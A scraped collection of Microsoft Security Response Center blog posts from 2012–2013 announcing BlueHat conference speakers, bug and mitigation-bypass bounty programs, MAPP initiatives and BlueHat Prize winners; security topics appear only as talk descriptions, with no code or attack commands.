BlueHat v13 is Coming, 06 Dec 2013 15:34:00 +0000 week, starting Thursday, we’ll be hosting our 13th edition of BlueHat. I’m always so impressed with the level of knowledge we attract to each BlueHat, and while the event is invite-only, we’ll be sharing glimpses into the event via this blog and the hashtag #BlueHat.

For each of the past six years I have had the honor to work among some of the most talented engineers I have ever met, here at Microsoft. I am inspired by the mission we embrace in securing our products, devices, and services. There are few other vantage points with as broad a footprint on the internet, since one of Microsoft’s early mottos helped put “a computer in every home.” Our job in the Microsoft Security Response Center (MSRC) is to help protect the customers who use the technology that the rest of the company works so hard to create. In everything we do in the MSRC, we strive to fulfill our mission to help insure the security and privacy of over a billion computer systems and our customers worldwide.

In 2005, we started the BlueHat conference to educate the developers and executives of Microsoft about current and emerging threats. The idea was to bring the hackers and security researchers to us, and in doing so foster an environment where the bidirectional exchange of ideas around the balance between security and functionality could meet fertile ground in the famed “hallway track.” We hand-pick just a small number of speakers and external attendees to concentrate on learning from them in most cases, and the chance to teach some of them from what we have learned, to help enhance the security and privacy of the Internet as a whole.

This year is no different in that we have invited speakers chosen to educate, amaze, and work with Microsoft to help us understand the emerging security threats to us and our customers. Together, we will rise to face the most important challenges in helping to secure the global Internet ecosystem.

Beginning on Dec 12, 2013, we’ll begin this year’s BlueHat by focusing on the threat landscape, learning about determined adversaries to help us defend our own network and assets, and tools to detect and mitigate attacks. Next we’ll welcome some of the world’s top experts to discuss devices and services, from low-level hardware to web services, to help us build products, devices, and services that are more secure from the ground up.

Finally, we’ll close out the conference with a thought-provoking track that I like to call the “Persistence of Trust,” where we will discuss the core elements that comprise the trust we rely on to support what the Internet has become – a global information sharing network that humanity uses to exchange goods, services, money, and most importantly, ideas. To support these functions, we must strengthen the technology that underlies and supports that trust, and we must design products, devices, and services that are resistant to security and privacy breaches. 

Here’s a quick overview of the planned speaker lineup for the two days of BlueHat v13.

Day 1: Thursday, December 12

Microsoft Technical Fellow, Anders Vinberg, will open BlueHat’s first track, Threat Landscape. Anders will talk about a broad assurance initiative for the next wave, covering Windows Server and System Center, in close alignment with the Core OS team, identity, Office and Azure. Next, we’ll set the stage with a talk from FireEye’s Zheng Bu and YiChong Lin designed to walk us through the techniques of the average and not so average targeted attacker, and show us ways to detect and combat the adversary. Microsoft Partner Development Manager, Mario Goertzel, will then speak to some of the hard problems that we face in antimalware – specifically, how we equip customers and partners with the right tools and analysis to help us all defend our networks and assets. Closing out the Threat Landscape track, Microsoft Principal Security Program Manager Lead, Graham Calladine, and Microsoft Senior Security Software Development Engineer, Thomas Garnier, will walk us through what attackers are doing now, how our current products and practices work against us, and how we can change this.

After lunch, the Devices & Services track kicks off with Josh Thomas, whose DARPA-funded research will reveal some hardware-level universal attacks that are possible on mobile devices. Next up we will have Microsoft’s first Mitigation Bypass Bounty recipient, James Forshaw talk about executing unsigned code on the Surface RT, without jailbreaking it. Next, Microsoft Principal Software Development Engineer, Lee Holmes, will talk with us about PowerShell. Chris Tarnovsky will then discuss Semiconductor devices and their backward steps in physical security through higher common criteria ratings. Next up, we’ll hear from Microsoft Partner Development Manager, Chris Kaler, and Microsoft Senior Program Manager, Serge Mera, about the latest in Message Analyzer. Mario Heiderich will then take us into the wilds of JavaScript MVC and templating frameworks. The afternoon will wrap up with a call to action from our own Russ McRee, followed by several lightning talks.

Day 2: Friday, December 13

Taking into consideration the inevitable socializing from the night before, we’re giving our attendees a slow morning. Between 9:00 AM and 12:00 noon we’ll have a recovery brunch with mimosas, lightning talks, and the famed hallway track. I’ll be the Day 2 keynote opening the track Persistence of Trust, at 12:30 noon. My talk will focus on security strategy at Microsoft, what we’re doing in terms of our defensive industry partner programs like MAPP, and of course, I’ll provide an update on our strategic Bounty programs. I’ll then handoff to Justin Troutman, who will talk about Mackerel, a cryptographic design and development framework based on the premise that real-world cryptography is not about cryptography at all; it’s about products. Peter Gutmann, famed researcher with the University of Auckland, New Zealand, will take the stage and illuminate the psychology of computer insecurity. After a short break, Alex Stamos, CTO of Artemis Internet, and Tom Ritter, Principal Security Engineer with iSEC Partners, will awaken us with tales life after elliptic curve crypto’s coming extinction. From Bromium Labs we’ll hear from Rahul Kashyap and Rafal Wojtczuk, who will discuss and demonstrate how to reliably break out of various popular sandboxes. Finally, closing BlueHat v13, renowned security and privacy expert and advocate of human rights, Morgan Marquis-Boire will explore what I call the elephant in the room, as he discusses the surveillance landscape and coercion resistant design.

As chair of the BlueHat content board, I would be remiss in my duty to the mission of BlueHat if I ignored the revelations of the summer of 2013, and the concerns about government surveillance of the internet. Hence, we will be continuing our internal dialog with a conversation with Morgan and others in attendance on how to design products, devices, and services that are more resistant to abuse and surveillance.  For us, and for over a billion of our customers worldwide, this issue transcends borders and politics. We are a global company and part of a global community, and as such we will continue to work with our customers, partners, and even our competitors to ensure a safer, more trustworthy Internet for all.

From the age of the great worms, to the evolution of more sophisticated and targeted attacks, to the era where modern warfare takes place on not only the information superhighway, but also on the civilian streets of the Internet, we will serve faithfully in our mission to help protect our customers from security and privacy breaches, no matter the adversary.


BlueHat is coming. Brace yourselves.


Katie Moussouris

Senior Security Strategist

Microsoft Security Response Center

(that’s a zero)


Bounty Evolution: $100,000 for New Mitigation Bypass Techniques Wanted Dead or Alive, 01 Nov 2013 10:20:00 +0000 who know me personally or follow me on Twitter are familiar with my obsession with karaoke. I do it as often as I can rope people into going with me, never forcing anyone to sing, though invariably everyone does – or at least sings from the sidelines to the songs they know. One of my all-time favorite songs is Bon Jovi’s Wanted Dead or Alive, and it’s the song in my head as I write this post. By the end, I hope to have a few more people singing along. Go ahead and load it into the playlist as you read on.

Today, Microsoft is announcing the first evolution of its bounty programs, first announced in June of 2013. We are expanding the pool of talent who can participate and submit novel mitigation bypass techniques and defensive ideas to include responders and forensic experts who find active attacks in the wild. That means more people can “sing along” to earn big bounty payouts than ever before.

Today’s news means we are going from accepting entries from only a handful of individuals capable of inventing new mitigation bypass techniques on their own, to potentially thousands of individuals or organizations who find attacks in the wild. Now, both finders and discoverers can turn in new techniques for $100,000.

Our platform-wide defenses, or mitigations, are a kind of shield that protects the entire operating system and all the applications running on it. Individual bugs are like arrows.  The stronger the shield, the less likely any individual bug or arrow can get through. Learning about “ways around the shield,” or new mitigation bypass techniques, is much more valuable than learning about individual bugs because insight into exploit techniques can help us defend against entire classes of attack as opposed to a single bug – hence, we are willing to pay $100,000 for these rare new techniques.

Building upon the success of our strategic bounty programs, Microsoft is evolving the bounty landscape to the benefit of our customers. The bounty programs we have created are designed to change the dynamics and the economics of the current vulnerability market. We currently do this in a few ways:

  1. Offering bounties for bugs when other buyers typically are not buying them (e.g. during the preview/beta period) allows Microsoft to get a number of critical bugs out of the market before they are widely traded in grey or black markets and subsequently used to attack customers.

  2. Offering researchers a $100,000 bounty to teach us new mitigation bypass techniques enables us to build better defenses into our products faster and to provide workarounds and mitigations through tools such as EMET.

  3. Evolving our bounty programs to include responders and forensic experts, who can turn in techniques that are being used in active attacks, enables us to work on building better defenses in to our products. We will work whenever possible with our MAPP program and engage our community network of defenders to help mitigate these attacks more rapidly.

In this new expansion of Microsoft’s bounty programs, organizations and individuals are eligible to submit Proof-of-Concept code and technical analysis of exploits they find in active use in the wild for our standard bounty amount of up to $100,000. Participants would also be eligible for up to $50,000 in addition if they also submit a qualifying defense idea. The submission criteria for both programs are similar – but the source may be different.

To participate in the expanded bounty program, organizations must pre-register with us before turning in a submission by emailing us at doa [at] Microsoft [dot] com. After you preregister and sign an agreement, then we’ll accept an entry of technical write-up and proof of concept code for bounty consideration.

We want to learn about these rare new exploitation techniques as early as possible, ideally before they are used, but we’ll pay for them even if they are currently being used in targeted attacks if the attack technique is new – because we want them dead or alive.

This evolution of our bounty programs is designed to further disrupt the vulnerability and exploit markets. Currently, black markets pay high prices for vulnerabilities and exploits based on factors that include exclusivity and longevity of usefulness before a vendor discovers and mitigates it.  By expanding our bounty program, Microsoft is cutting down the time that exploits and vulnerabilities purchased on the black market remain useful, especially for targeted attacks that rely on stealthy exploitation without discovery.

We shall see how the song plays out, but I for one am excited for more singers to step up to the microphone, or to sing out from the sidelines.


Katie Moussouris

Senior Security Strategist and karaoke MC

Microsoft Security Response Center
(that’s a zero)

Congratulations to James Forshaw Recipient of Our First $100,000 Bounty for New Mitigation Bypass Techniques!, 08 Oct 2013 09:47:00 +0000 to James Forshaw for coming up with a new exploitation technique to get our first ever $100,000 bounty. A security vulnerability researcher with Context Information Security, James already came in hot with design level bugs he found during the IE11 Preview Bug Bounty, and we’re thrilled to give him even more money for helping us improve our platform-wide security by leaps.

Coincidentally, one of our brilliant engineers at Microsoft, Thomas Garnier, had also found a variant of this class of attack technique. Microsoft engineers like Thomas are constantly evaluating ways to improve security, but James’ submission was of such high quality and outlined some other variants such that we wanted to award him the full $100,000 bounty.

While we can’t go into the details of this new mitigation bypass technique until we address it, we are excited that we will be better able to protect customers by creating new defenses for future versions of our products because we learned about this technique and its variants.

The reason we pay so much more for a new attack technique versus for an individual bug is that learning about new mitigation bypass techniques helps us develop defenses against entire classes of attack. This knowledge helps us make individual vulnerabilities less useful when attackers try to use them against customers. When we strengthen the platform-wide mitigations, we make it harder to exploit bugs in all software that runs on our platform, not just Microsoft applications.

If you have a new mitigation bypass technique that can defeat our latest platform-wide mitigations, or new defense idea, and would like to participate in our bounty programs, please see the official guidelines here. For a technical description of an exploitation technique that would have qualified, please read the SRD blog by Matt Miller and William Peteroy here. If you have an idea that’s in scope, please send in your whitepaper and proof of concept code to secure [at] Microsoft [dot] com.

We’re not done evolving our freshly minted bounty programs, which have now paid out over $128,000. Watch this blog for future developments as we continue to hone the biggest ongoing vendor bounty program in the industry.

Until then, our special thanks go to James: Congratulations and well done! You not only made history by receiving a total of $109,400 from our bounty programs, you’re also helping us make our customers safer from entire classes of attack. On behalf of over a billion people worldwide — Thank you and way to go!!


Katie Moussouris

Senior Security Strategist, Microsoft Security Response Center
(that’s a zero)

Bounty News Update: Bountiful Harvest, 04 Oct 2013 13:21:00 +0000 is a season traditionally associated with a harvest after planting the seeds and tending the crops. Today I’m proud to announce the names of six very smart people who have helped us make our products more secure by participating in our new bounty programs.  When we launched our bounty programs in June this year, we had a few strategic goals in mind:

  • Increase the win-win between the hacker/security researcher community and Microsoft’s customers, and build relationships with new researchers in the process
  • Receive more vulnerability reports earlier in the release cycle of our products, ideally during the beginning of the preview (or beta) period
  • Learn about new exploitation techniques that can be used to defeat our platform-wide defenses, so we can build protections against entire classes of attack

Now that we have permission from the bounty program recipients to publish their names and bounty amounts, I’ll list them all here. You may have seen a few congratulatory and celebratory tweets; we wanted to officially acknowledge these security researchers who have helped our customers by participating in our bounty programs.


On behalf of over a billion customers, THANK YOU!
James Forshaw
Ivan Fratric
Jose Antonio Vazquez Gonzalez
Masato Kinugawa
Fermin J. Serna
Peter Vreugdenhil


I am also thrilled to highlight a few of our bounty program results:


We’ve worked with so many bright security researchers through the years, and are thrilled that through the bounty programs, we received reports from researchers who had never reported to us directly before. This means we have even more great minds interested in working directly with us to help make our products more secure.

IE11 Preview Bug Bounty:

During the first 30 days of the IE11 preview period we received several vulnerabilities that qualified for a bounty, in contrast to the first 30 days of the IE10 beta, when we did not receive any bulletin-class reports. The Preview period is a great time for us to receive these reports because we can address these issues earlier. Oftentimes, researchers typically do not report these findings until after code was released to manufacturing. With these submissions, we will be able to address these vulnerabilities earlier in the process providing a more secure version of Internet Explorer

As the leaves turn colors and the temperatures cool off, I’m happy to be sharing the bountiful harvest of our programs, started as seeds planted in early summer. It’s been a great first three months of Microsoft’s bounty programs, and we’re overjoyed that our programs have been met with great participation and enthusiasm from the hacker community.

Stay tuned for more news coming soon!

Katie Moussouris
Senior Security Strategist, Microsoft Security Response Center  (that’s a zero)

MAPP Initiatives Update – Knowledge Exchange Platform, 16 Sep 2013 09:45:00 +0000 little more than a month ago, we announced some new initiatives for the Microsoft Active Protections Program (MAPP). One of those announcements was “MAPP for Responders.” The initial response has been extremely positive, so we wanted to provide more information on how we are moving this program forward.

Since the announcement, we’ve been working towards launching two initiatives as a single beta with a limited set of customers and partners. The first is the pilot of the MAPP Scanner service that we previously announced.  The second initiative is a beta of a completely new automated knowledge exchange platform. We alluded to this platform in our first post and want to give some additional details on this project.

Simply put, this is a distributed platform that runs as a web service that provides the ability to automate the sharing and consumption of threat information in machine readable formats. As mentioned before, the platform supports the STIX and TAXII open specifications developed by MITRE, but it has been designed to support any message exchange services and message formats that partners decide to implement. This helps to accomplish multiple goals, but here are two highlights:

First, the platform will empower the industry by facilitating the sharing of threat information and enabling knowledge exchange scenarios that do not exist today. As a platform, customers and partners will have the flexibility to share and consume data with granular control.

Second, the platform has been designed to be extremely extensible, with a modular plugin architecture that will allow for an unlimited number of services to be built on top of and supported by it.

Figures 1 – 3 illustrate some of the sharing scenarios enabled by the platform:


Figure 1 Publisher Subscriber


Figure 2 Peer to Peer


Figure 3 Hub and Spoke

We have designed this platform to integrate into existing environments acting as an interchange point between both external and internal services and data formats. The platform enables real-time information sharing, and because the data is machine-readable, organizations can choose to automatically push the data into their network protection systems.

I mentioned a limited beta with qualified customers and partners and wanted to list some of the criteria for participation. In addition to being able to sign required agreements and having a dedicated incident response team, participants in the initial beta will be required to provide a feed of threat data into the system. The beta will operate in phases with each lasting approximately 3 months. We expect to conduct three to four phases, expanding to more participants as we progress.

Many customers have already contacted us concerning participation and we will be following up with all of you very soon. For those enterprise customers who are interested in finding out more, the best path is to talk to your Microsoft Technical Account Manager (TAM). Other incident responders can send a note to

Keep an eye on this blog for future updates and announcements. We expect this work to go on for several months and are looking forward to input from participants to help shape the future of automated knowledge exchange.


Jerry Bryant
Senior Security Strategist Lead
Microsoft Trustworthy Computing

Nine to tide you over: Video highlights from BlueHat v12, 09 Apr 2013 12:52:00 +0000 more]]>It has been nearly four months since we gathered in Redmond for BlueHat v12, and we’ve almost caught up on our sleep. As we prepare for what promises to be a momentous year for the BlueHat program – culminating in December with BlueHat v13 – we’ve selected nine of the most compelling, talked-about, or just plain chewy talks from last year’s festivities to share with you.

  • Fraud and Abuse: A Survey of Life on the Internet Today –> WATCH IT ON DEMAND
    Ellen Cram Kowalczyk, Principal Security Program Manager Lead, Microsoft

    Kowalczyk kicked off BlueHat v12 in the morning with a look at two of the most difficult security issues facing our customers today. When you’re in the process of becoming the leading devices and services company, this is the sort of thing that’s on your mind every morning.

  • Social Authentication –> WATCH IT ON DEMAND
    Alex Rice, Product Security, Facebook

    Over the past year, Facebook engineers have been working on various attempts to expand authentication from “something you know” to “someone you know.” Rice’s talk demonstrates some of the results and details the lessons his company has learned along the way.

  • Scriptless Attacks: Stealing the Pie Without Touching the Sill –> WATCH IT ON DEMAND
    Mario Heiderich, Dr.-Ing, Ruhr-University in Bochum, Germany

    Removing JavaScript from the cross-site scripting equation doesn’t necessarily take away the XSS pain, as Dr. Heiderich demonstrates. Learn how attackers can use seemingly benign features to build side-channel attacks that can measure and exfiltrate data from even well-protected sites – and find out what can be done to stop it.

  • Sh*t My Cloud Evangelist Says… Just Not My CSO –> WATCH IT ON DEMAND
    Chris Hoff, Senior Director and Security Architect, Juniper Networks

    In front of an audience evenly divided between developers and security folk, Chris Hoff laid out the differences in worldview between the two – yes, there are a few – and how those translate into the world of cloud computing. More secure? Less secure? Let the debate begin…

  • Don’t Stand So Close to Me: An Analysis of the NFC Attack Surface –> WATCH IT ON DEMAND
    Charlie Miller, Systems Software Engineer, Twitter

    Near-field communication (NFC) technology is growing in popularity, with mobile devices leading the communications charge. But when you tap your phone to an NFC-enabled terminal to make a credit-card payment, how do you know you haven’t been owned – or worse? Miller looks at how NFC technology expands the potential attack surface for mobile devices.

  • Building Trustworthy Windows Store Apps –> WATCH IT ON DEMAND
    David Ross, Principal Software Security Engineer, Microsoft and Crispin Cowan, Senior Program Manager, Windows Security, Microsoft

    The Windows Store environment is designed to protect consumers’ machines and data from individual apps, but that puts serious responsibility on developers to use secure coding practices. Ross and Cowan look at what that means and how developers can approach the challenge without tears.

    Matthew Garrett, Senior Software Engineer, Nebula

    The Unified Extensible Firmware Interface (UEFI) brings far greater security to the firmware environment, letting developers build security policies that extend all the way into the most basic layers of shipped code. But do we lose platform differentiation in the process? Garrett details why that’s not necessarily the case.

  • Pass the Hash and Other Credential Theft and Reuse: Preventing Lateral Movement and Privilege Escalation –> WATCH IT ON DEMAND
    Patrick Jungles, Security Program Manager, Microsoft

    Credential theft and re-use attacks have gained in popularity in recent years, and there’s nothing tastier for some attackers than your delicious, delicious hashes. Jungles, the Microsoft PM who led the company-wide workgroup that researched and released our recent pass-the-hash whitepaper, presents an overview of the group’s findings.

  • Why Johnny Can’t Patch: And What We Can Do About It –> WATCH IT ON DEMAND
    David Seidman, Senior Security Program Manager, Microsoft

    Microsoft works hard to develop and release security bulletins as soon as we’re aware of a vulnerability that needs addressing. So how is it some users remain vulnerable to issues for which the cure has existed for months, if not years? Seidman dives deep into who doesn’t patch, why, and what might change their ways.

Enjoy! We’re looking forward to BlueHat v13 – Return to your “C:\>”(s). We suspect there will be a lot to talk about.

Emily Anderson
Security Program Manager, MSRC, Microsoft

On the Shoulders of Blue Giants, 13 Dec 2012 09:40:00 +0000 more]]>

Katie Moussouris

Senior Security Strategist Lead, Head of Microsoft’s Security Community and Strategy Team

Cool vulns, BlueHat, soldering irons, quantum teleportation

Rudeness, socks-n-sandals, licorice

BlueHat v12 here in Redmond is in full swing – it started yesterday for full-time Microsoft employees only, and continues today as we welcome our invited guests from beyond Microsoft. I’m excited to see and contribute to this year’s content as it unfolds on stage, and even more excited for all the side meetings that take place here in the hallways of the event.  It makes sense for us to take a moment to recognize the people who have contributed to BlueHat over the years, as well as to look forward to where we are going in terms of security community outreach at Microsoft in the years to come.

The BlueHat conference itself was groundbreaking in 2005, when the first group of hackers were invited by Window Snyder and Andrew Cushman to speak directly to Microsoft developers and executives about the products in which they were able to find security vulnerabilities. Back then, no major vendors had formally hosted an internal security conference before, but doing events like BlueHat is now an accepted industry practice for many major vendors.

We as an industry owe Window and Andrew our thanks for blazing this path, and also many thanks to the people over the years who have developed the BlueHat conference to be what it is today. That list includes but is not limited to Kymberlee Price, Celene Temkin, Dana Hehl, Sarah Blankinship, Mike Reavey and, most recently, Emily Anderson. Part of what makes BlueHat special to the speakers and attendees are the personal touches and vision that each person on the list above contributed.

One of the elements that makes BlueHat such a vital part of our overall security community outreach at Microsoft is the “hallway track.” This is where the invited guests and the Microsoft folks can dive deeper into the topics that are being presented, or diverge into other topics entirely – sometimes with far-reaching effects on improving security by leaps and bounds. As the conference has evolved over the years, some of the people we invite are here to meet with Microsoft engineers and to learn from the content that is presented, such as the MAPP partners we invite. It is the exchange of ideas that can help improve our products, as well as the products of others who are in attendance, that continues to make BlueHat special.

Many other conversations that will take place in the hallways at BlueHat over this week and beyond will help shape security defense for another generation of the Microsoft computing ecosystem. The relationships being forged and reinforced among Microsoft product teams, security engineers, and the external security research community in these halls will likely bear fruit in terms of helping to improve security for existing and future products and services.

There is an old saying that can be paraphrased as “If we can see a little further out into the horizon, it because we are standing on the shoulders of giants.”  Even as we face some familiar and not-so-familiar security frontiers such as online service security, mobile computing device security, app store security, and the ever-present human factor being exploited via social engineering attacks, we as members of a holistic global computing ecosystem will continue to benefit from the multi-directional exchange of ideas that happen at BlueHat.

Our team continues to expand the ways and means by which we facilitate these pivotal conversations, standing on the shoulders of “blue giants” who have built the security community outreach programs like the BlueHat conference itself, and our worldwide security conference sponsorship program.  As we evolve and grow, we add new programs to the overall outreach strategy to help us get better at security today and in the future. An example of a new program we added recently is the BlueHat Prize contest for security defense, for which this year we gave away over $260,000 in cash prizes for ideas in platform-level defense.  As I said on stage at BlueHat Wednesday morning, Microsoft will continue to invest in security defense challenges — and the next iteration of the BlueHat Prize contest will be announced around the time of the BlackHat USA conference next summer.

So to those who came before, thank you, and to those who will come after, enjoy the view.  I, for one, can’t wait to see what’s just over the horizon, and it’s looking very blue.

Katie Moussouris
Senior Security Strategist, MSRC

Announcing BlueHat v12, 21 Nov 2012 14:50:00 +0000 more]]>The days are getting shorter, the holidays are getting nearer, and looming on the horizon is a trio of 12’s – it’s almost time for the 12th BlueHat Conference, on tap for the twelfth month of 2012. We have a terrific lineup of speakers from both inside and outside the company; there’s nothing much we can do about the weather in Seattle in mid-December, but indoors we have compelling work to do on making the cloud, mobile devices, the Internet, and the rest of the computing ecosystem, safer for customers.

Here’s a quick overview of the planned speaker lineup for the two days of BlueHat v12. For more detail, please check back here in the weeks between now and the conference.

Day 1: Thursday, December 13

We’ll open the conference’s first track, Anti-Fraud & Abuse, with author and Microsoft Technical Fellow Mark Russinovich. Mark will also be joining attendees for a lunchtime book-signing (have you read Trojan Horse yet?). He’ll be followed in the morning by Microsoft’s Ellen Cram Kowalczyk, speaking on fraud and abuse, and specifically looking at life on the Internet today.  Facebook’s Alex Rice will give attendees a look into how the world’s biggest social-networking site handles attempts to abuse its users. After a short break, Christopher Hadnagy, author of “Social Engineering: The Art of Human Hacking,” joins us to discuss the role social engineering plays in successful (and unsuccessful) fraud attempts. Finally, Microsoft’s Alex Weinert will give us a look at his work at Microsoft on anti-fraud.

After lunch, the Cloud & Online Services track kicks off with Mario Heiderich, who’ll cover how, after sustained efforts to mitigate XSS and similar cross-site scripting attacks, an attack surface remains (and what can be done about that). He’s followed by Chris Hoff of Juniper Networks, speaking frankly about what cloud evangelists know…but won’t tell CSOs. We’ll have a break and rejoin the action with MSRC Engineering’s own Gavin Thomas, who looks at better security through Microsoft HPC Server and Windows Azure, followed by Tim Maletic and Chris Pogue of Trustwave discussing OPFOR. The afternoon wraps up with a call to action from Mark, followed by several lightning talks on subjects sure to surprise and delight.

Day 2: Friday, December 14

We’re giving you all a later start (9:45 AM), taking into consideration your socializing the night before. MSEC program manager and emcee, Leigh Honeywell, will open the second day of conference at 9:45 AM, with the Vices & Devices track. She’ll turn the floor over to Charlie Miller, who’s currently playing a major part in Twitter’s security push; he’ll talk about attack surfaces in the NFC (near-field communications) protocol stack. After a short break, Microsoft’s David Ross and Crispin Cowan dive into the world of Windows 8 applications. Matt Garrett of Red Hat joins us to answer “Why UEFI?” Lunch will feature an Online Services Security and Compliance (OSSC) Lunch n’ Learn, focusing on managing security risk to Microsoft’s global online services.

Friday afternoon brings the conference’s final track, Hot Topics, with a combination of guests, current Microsoft employees, and alumni on tap. First, James Forshaw of Context Information Security discusses the allure for security researchers of managed languages. Next, Fermín Serna – once a Microsoft colleague, now at Google – speaks of current thinking on information-leak vulnerabilities. After a break, MSRC senior security program manager David Seidman explains why some users simply won’t, don’t, or can’t apply security updates – whatever the consequences. The afternoon will close with Mat Honan, Senior Writer for Wired, whom we think will put the conference’s conversations and revelations in perspective as he describes how all the issues we’ve discussed can touch the lives of the customers we aim to protect.

Thanks –

Emily Anderson
Security Program Manager, MSRC

BlueHat: Something Old, Something New, All Blue, 24 Oct 2012 17:04:00 +0000 more]]>

Katie Moussouris

Senior Security Strategist Lead, Head of Microsoft’s Security Community and Strategy Team

Cool vulns, BlueHat, soldering irons, quantum teleportation

Rudeness, socks-n-sandals, licorice

Reflecting on my past five years at Microsoft (I know! How time flies!), I can see with fresh perspective just how far we’ve come, while staying true to our goals of helping to protect customers and the computing ecosystem. I just recently returned from maternity leave and launched right into conference season with a bang, speaking at several conferences where I had the opportunity to hang out with old and new friends in the security researcher community. As Microsoft completes its tenth year of working with the broader security community as part of our Trustworthy Computing tenet, it’s a good time to look at how the relationship has developed so far.

Our on-campus BlueHat Briefings started back in 2005. At the time we had two key goals: to expose our own developers and technical contacts to smart researchers both inside and outside our very large company, and to give researchers a conduit to the developers and tech folk who might not yet appreciate the value of thinking like an attacker. As you might guess, at the beginning there was suspicion and maybe even a little fear on both sides, as researchers came to Redmond, and executives and product teams came out of their comfort zones, to talk honestly about security.  But it worked, and others follow the model with similar conferences of their own now. And even as we prepare for the twelfth edition of the Briefings, it’s still great watching a researcher explain an issue directly to the developers responsible for writing the code to fix it.

Since then, the BlueHat Briefings have evolved into part of a larger strategy to play well within the community and improve the broader computing ecosystem. In addition to the Briefings, we provide direct financial sponsorship and support for other industry events around the world – this year, 20 or so conferences across 12 countries.  Some improvements in relations with individual researchers have been simple, like establishing our bulletin acknowledgement policy and Online Services Acknowledgements policy to recognize researchers who report issues directly to us. We recognize individual talent in other ways, offering contracts for penetration testing of products in development – in fact, many of the current pen-testing contracts in effect at Microsoft right now were born from researchers that have shown their talents by reporting issues to MSRC.  Sometimes, we’re able to hire this talent to Microsoft as well; we have great talent from the researcher community working here, and we’re always looking for more. And we don’t stop finding ways to work meaningfully with the community. This past summer, we awarded $260,000 to researchers as a part of the first-ever BlueHat Prize. This prize offers financial rewards to researchers to develop security defenses that can take out entire classes of attacks.

In seven weeks we will gather together at our 12th BlueHat Briefings here in Redmond and have this opportunity for the bidirectional exchange of ideas among people who are passionate about security, both inside and outside of Microsoft.  We have gone from listening and learning from the community to being a true part of it. As the landscape has changed, we’ve evolved our response and engagements and will continue to do so.

Where does this working relationship with this community — and the future of security research — go over the next 10 years? We’ll focus on building cool products that the researcher community will inevitably help us secure, in their own way – by reporting issues to us via Coordinated Vulnerability Disclosure, by coming to educate and “exploitain” our developers and executives at the BlueHat Briefings, and by working for Microsoft and becoming part of our internal security community to help us defend over a billion computer systems worldwide. We’re excited to imagine what the next decade will look like and how we’ll work together, and I’m just as curious today about what is next in the cobra-mongoose battle between attackers and defenders as I was when I joined this company over five years ago.

Stay tuned for the speaker line-up as we move closer to the event. I look forward to welcoming the next members of our elite group – our BlueHat community – as we evolve and grow together.

Katie Moussouris
Senior Security Strategist Lead

The BlueHat Prize V1.0 – And the Winners Are…, 26 Jul 2012 14:40:00 +0000 more]]>

Katie Moussouris

Senior Security Strategist Lead, Head of Microsoft’s Security Community and Strategy Team

Cool vulns, BlueHat, soldering irons, quantum teleportation

Rudeness, socks-n-sandals, licorice

As we wrap up the first BlueHat Prize contest, we wanted to share what we learned while running the first competition, from a major vendor, offering a large cash prize for defensive security research. Not only did we get to motivate the development of technical mitigation technology, but we also achieved some valuable non-technical goals as well.

We’ll announce the winners in this post, so scroll down if you can’t wait.

Bonus #1: We identified security defense talent that we may never have encountered otherwise, and helped the world get to know them too.

Some of the contestants were certainly well-known names in the security research community; some were people we had never heard of before. Running the BlueHat Prize contest allowed us insight into a greater number of people who are doing some deep thinking in the areas of security mitigation technology. This not only helps Microsoft find and work with talented people, but the spotlight that we can help shine on all of these contestants will hopefully help them market their ideas and talent so that the entire security industry can benefit and improve.

Bonus #2: We aligned some of the top “offensive security” minds to work with us on defense – with excellent results.

I often say that some of the best defenders come from the “offense” side of the security equation. I believe that you truly have to understand how to break into systems in order to devise effective plans for how to defend those systems. One of the goals we set out to accomplish with this contest was to create both an incentive and an opportunity for fame and fortune in the area of security defensive research that never existed at this scale before. We are very happy that the security community responded positively to our challenge, and some great minds chose to participate.

With those positive bonus outcomes we will not wait any longer to announce the winners. For an in-depth technical analysis of the winning entries, with the contest judging criteria applied, please see Matt Miller’s blog post on the SRD blog.


Vasilis Pappas wins $200,000 for his idea, kBouncer – an efficient and fully transparent ROP mitigation technique.

Ivan Fratric wins $50,000 for his idea, ROPGuard – a system that can detect and prevent the currently used forms of return-oriented programming (ROP) attacks at runtime. 

Jared DeMott wins an MSDN subscription, valued at $10,000, and was also surprised on stage live with a check for $10,000 cash for his idea, /ROP – a system that lowers the effect of address space disclosures and mitigates known ROP exploits. 


So what is next for the BlueHat Prize?

Check the BlueHat Prize website in the next several weeks for an updated page that will include information on the other contest entries. These beautiful minds all deserve the thanks and attention of the security community, and we are excited to provide them with a venue to showcase their defensive security ideas.

One thing is certain – we will continue to invest in security defense at Microsoft, and we will continue to offer cash incentives to the security community for helping Microsoft, and the rest of the industry, to help improve the state of security for the entire ecosystem. In sports, as in life, a great team understands both offense and defense. To address the security threats of today and tomorrow, we as an industry need to appreciate both.

 – Katie Moussouris

Senior Security Strategist, MSRC

The BlueHat Prize Survey at BlackHat – Submit Security Defense Questions for a Chance to Win $5000, 16 Jul 2012 00:00:00 +0000 more]]>


Katie Moussouris

Senior Security Strategist Lead, Head of Microsoft’s Security Community and Strategy Team

Cool vulns, BlueHat, soldering irons, quantum teleportation

Rudeness, socks-n-sandals, licorice


As we inch closer to Black Hat in Vegas this year, we wanted to kick off the ten-day countdown to our first BlueHat Prize contest winners’ announcement with an invitation to those attending Black Hat. Microsoft is conducting a survey at our Black Hat booth to find out what the security community thinks are the most important industry-wide security issues that need answers. When
you participate in the survey at our booth, we’ll enter you into our BlueHat Prize Question Sweepstakes for a chance to win $5,000 USD*!

We will give away $5,000 twice per day at random drawings at our booth On July 25 and July 26, – once around lunch and once at the end of each day, for a total of $20,000 USD in cash.

The official rules are found here, but here are some highlights:

• The only way to enter this contest is to visit the Microsoft booth in person at Black Hat and submit a question.
• Only one entry per person is allowed (we’ll scan your conference badge, so no funny business!).
• Valid entries in the sweepstakes must be a defense-oriented security question that could potentially be used in a future BlueHat Prize contest.
• The issue you submit should be industry-wide, e.g., “Design a defense technology or strategy to defend against social engineering.” or “What would be the best approach to defend against DDoS?”

While we may not use the specific defense-oriented questions gathered in this sweepstakes, the survey will help us shape a future BlueHat Prize contest with the input from the broader security community. We know not everyone makes it to Black Hat, but we do think there is a decent sampling of various security industry representatives there, so as a survey it works as a
decent sample set. If you’d like to let your thoughts be heard, even if you are not at Black Hat, feel free to join the conversation on Twitter with the hashtag #BlueHatPrize.

As for when we will announce what the next BlueHat Prize contest will be, stay tuned for that news on this blog after Black Hat. For those of you attending Black Hat in person this year, start thinking about what you believe is the biggest industry-wide security issue that needs a great defense. Microsoft may use your idea in our next BlueHat Prize contest, and you might
win $5000!

Katie Moussouris

Senior Security Strategist, MSRC

